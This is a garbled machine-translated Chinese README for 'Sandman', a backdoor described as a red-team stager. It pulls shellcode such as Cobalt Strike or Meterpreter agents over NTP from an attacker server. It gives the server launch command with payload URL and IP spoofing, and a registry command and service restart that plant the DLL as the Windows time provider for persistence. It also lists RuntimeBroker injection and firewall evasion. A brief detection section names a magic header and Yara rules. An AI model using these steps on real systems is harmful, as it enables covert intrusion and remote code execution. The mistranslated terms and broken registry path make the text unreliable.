Sandman

桑德曼（Sandman）是一個後門，旨在在紅色團隊參與期間在硬化網絡上工作。

桑德曼（Sandman）用作stager，並利用NTP（同步時間和日期的協議）從預定義的服務器中獲取並運行任意的殼牌。

由於NTP是一項協議，該協議被許多防御者忽略，導致廣泛的網絡可訪問性。

在Windows / *Nix機器上運行：

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

• 網絡適​​配器：您希望服務器偵聽的適配器（例如Windows的以太網， *Nix的ETH0）。

• 有效載荷URL：您的殼牌碼的URL，可能是您的代理商（例如，鈷ststrike或Meterpreter）或其他stager。

• IP欺騙：如果您想欺騙合法的IP地址（例如，time.microsoft.com的IP地址）。

首先，您可以如下所述編譯SandManbackDoor，因為它是一個輕巧的C＃可執行文件，您可以通過執行eodeassembly執行它，作為NTP提供商運行或僅執行/注射。

要使用它，您將需要遵循簡單的步驟：

• 添加以下註冊表值：

 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "

• 重新啟動W32Time服務：

 sc stop w32time
sc start w32time

注意：確保您使用X64選項編譯，而不是任何CPU選項！

• 從攻擊者的受控服務器中獲取並執行任意有效載荷。

• 由於通常在FW中允許NTP，因此可以在硬化網絡上工作。

• 通過IP欺騙來冒充合法的NTP服務器。

• Python 3.9

• 要求在需求文件中指定。

為了編譯後門，我使用了Visual Studio 2022，但是如“用法”部分中提到的，可以使用VS2022和CSC編譯。您可以使用use_shellcode並使用Orca的ShellCode或不使用use_shellcode來對其進行編譯。

要編譯後門我使用了Visual Studio 2022，您還需要安裝DLLEXPORT（通過Nuget或任何其他方式）來編譯它。您可以使用use_shellcode並使用Orca的ShellCode或不使用use_shellcode來對其進行編譯。

• 將ShellCode注入RuntimeBroker。

• 可疑的NTP通信始於已知的魔術標頭。

• Yara規則。

• 孔尺寸的逆戟鯨。

• 特別感謝蒂姆·麥加芬（Tim McGuffin）的時間提供商的想法。

感謝那些已經做出貢獻的人，我會很樂意接受貢獻，提出一個拉動請求，我將對其進行審查！